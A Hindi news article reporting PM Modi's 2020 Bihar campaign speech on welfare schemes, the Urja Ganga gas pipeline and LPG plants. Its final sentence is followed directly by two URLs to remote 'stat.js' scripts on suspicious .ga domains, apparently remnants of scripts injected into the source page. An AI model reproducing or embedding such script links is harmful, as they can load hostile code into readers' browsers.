बिहार विधानसभा चुनाव 2020 में मतदान के साथ-साथ चुनाव प्रचार भी चल रहा है। चुनाव प्रचार में पहुंचे पीएम मोदी और जनता से जुड़कर उन्होंने बिहार की जनता से कुछ वादे भी किए। साथ ही साथ पीएम मोदी ने पिछले कुछ सालों में किए गए कार्यों को जनता को याद दिलाते हुए बोला कि बिहार के उस गरीब से गरीब परिवार को भी मूलभूत सुविधाएं मिल रही है।
जिसका इंतजार उन्होंने दशकों तक किया गरीब से गरीब परिवार को बिजली, गैस कनेक्शन, शौचालय और आयुष्मान योजना के तहत मरीजों को इलाज में भी सुविधा मिल रही है। पीएम मोदी ने कहा कि आने वाले सालों में उन्हें और विकास करना है बिहार को और आधुनिक बनाना है। उसके बाद पीएम मोदी ने स्वामित्व योजना की चर्चा करते हुए जनता को बताया कि अब स्वामित्व योजना के कारण उनके घरों में कोई भी कब्जा नहीं कर सकता।
उसके बाद बिहार के विकास को लेकर एक बड़ी योजना के बारे में बताया प्रधानमंत्री ऊर्जा गंगा योजना के तहत पीएम मोदी ने बोला कि दुनिया की सबसे बड़ी गैस पाइपलाइन प्रोजेक्ट का हिस्सा बनेगा बिहार। पीएम मोदी ने बोला कि बिहार दुनिया की सबसे बड़ी गैस पाइपलाइन का हिस्सा बनने वाला है। और पीएम मोदी ने बताया कि बिहार के लिए जो प्रधानमंत्री पैकेज दिया गया था उसमें पेट्रोलियम और गैस से जुड़े सबसे बड़े 10 प्रोजेक्ट थे जो अब लगभग पूरे हो चुके हैं।
हजारों करोड़ों के इन प्रोजेक्टों में से मुजफ्फरपुर में एलपीजी प्लांट लगा है इसके अलावा पटना और पूरा में भी एलपीजी प्लांट का विस्तार किया गया है। बिहार में कम प्रदूषण फैलाने वाली ट्रैफिल व्यवस्था का काम चल रहा है। और बहुत से जो कारखाने बंद हो गए थे उन्हें फिर से चालू करना आसान हो गया है। इस पाइपलाइन के जरिए बिहार में बहुत अधिक विकास होने वाला है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms